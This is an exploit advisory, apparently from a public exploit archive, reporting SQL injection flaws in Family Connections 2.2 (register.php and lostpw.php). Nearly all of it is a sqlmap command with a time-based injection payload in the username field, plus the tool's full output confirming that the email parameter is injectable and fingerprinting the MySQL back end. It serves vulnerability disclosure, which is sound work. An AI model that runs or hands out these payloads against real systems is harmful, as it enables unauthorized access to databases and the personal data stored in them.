Family Connections version 2.2 suffers from multiple remote SQL injection vulnerabilities.
932e4fe173014b2cdd8cb18dcf76db76665998ad415fe10ccb70b1436c237db3
# Exploit Title: Family Connections version 2.2 SQL Injection
# Date: March 15, 2010
# Author: Blake
# Software Link: http://sourceforge.net/projects/fam-connections/files/Family%20Connections/2.2/FCMS_2.2.zip/download
# Version: version 2.2
# Tested on: Windows XP SP3
Multiple SQL Injection vulnerabilities are possible in the register.php and lostpw.php. Example with sqlmap against register.php:
sqlmap -u "http://192.168.1.149/fcms/register.php" --method "POST" --data "username=%27+and+benchmark%2810000000%2CMD5%281%29%29%23&lname=on&fname=on&password=on&email=on&submit=Submit"
sqlmap/0.6.4 coded by Bernardo Damele A. G. <bernardo.damele@gmail.com<mailto:bernardo.damele@gmail.com>>
and Daniele Bellucci <daniele.bellucci@gmail.com<mailto:daniele.bellucci@gmail.com>>
[*] starting at: 16:39:13
[16:39:13] [INFO] testing connection to the target url
[16:39:41] [INFO] testing if the url is stable, wait a few seconds
[16:40:37] [INFO] url is stable
[16:40:37] [INFO] testing if POST parameter 'username' is dynamic
[16:40:38] [WARNING] POST parameter 'username' is not dynamic
[16:40:38] [INFO] testing if POST parameter 'submit' is dynamic
[16:41:05] [WARNING] POST parameter 'submit' is not dynamic
[16:41:05] [INFO] testing if POST parameter 'lname' is dynamic
[16:41:33] [WARNING] POST parameter 'lname' is not dynamic
[16:41:33] [INFO] testing if POST parameter 'fname' is dynamic
[16:42:00] [WARNING] POST parameter 'fname' is not dynamic
[16:42:00] [INFO] testing if POST parameter 'password' is dynamic
[16:42:27] [WARNING] POST parameter 'password' is not dynamic
[16:42:27] [INFO] testing if POST parameter 'email' is dynamic
[16:42:57] [INFO] confirming that POST parameter 'email' is dynamic
[16:43:57] [WARNING] unable to connect to the target url or proxy, sqlmap is going to retry the request
[16:44:28] [INFO] POST parameter 'email' is dynamic
[16:44:28] [INFO] testing sql injection on POST parameter 'email' with 0 parenthesis
[16:44:28] [INFO] testing unescaped numeric injection on POST parameter 'email'
[16:44:57] [INFO] POST parameter 'email' is not unescaped numeric injectable
[16:44:57] [INFO] testing single quoted string injection on POST parameter 'email'
[16:45:54] [INFO] confirming single quoted string injection on POST parameter 'email'
[16:46:23] [INFO] POST parameter 'email' is single quoted string injectable with 0 parenthesis
[16:46:23] [INFO] testing if User-Agent parameter 'User-Agent' is dynamic
[16:46:50] [WARNING] User-Agent parameter 'User-Agent' is not dynamic
[16:46:50] [INFO] testing for parenthesis on injectable parameter
[16:48:18] [INFO] the injectable parameter requires 0 parenthesis
[16:48:18] [INFO] testing MySQL
[16:48:46] [INFO] confirming MySQL
[16:49:13] [INFO] query: SELECT 5 FROM information_schema.TABLES LIMIT 0, 1
[16:49:13] [INFO] retrieved: 5
[16:55:25] [INFO] performed 13 queries in 371 seconds
[16:55:25] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.1, Apache 2.2.14
back-end DBMS: MySQL >= 5.0.0
[*] shutting down at: 16:55:25